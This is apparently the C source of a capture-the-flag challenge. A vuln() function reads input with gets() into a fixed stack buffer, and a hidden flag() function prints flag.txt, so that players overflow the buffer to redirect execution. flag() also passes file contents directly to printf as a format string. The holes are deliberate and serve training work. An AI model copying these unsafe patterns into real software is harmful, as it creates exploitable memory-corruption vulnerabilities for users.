#define FLAGSIZE 64
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFFSIZE];
gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
vuln();
return 0;
}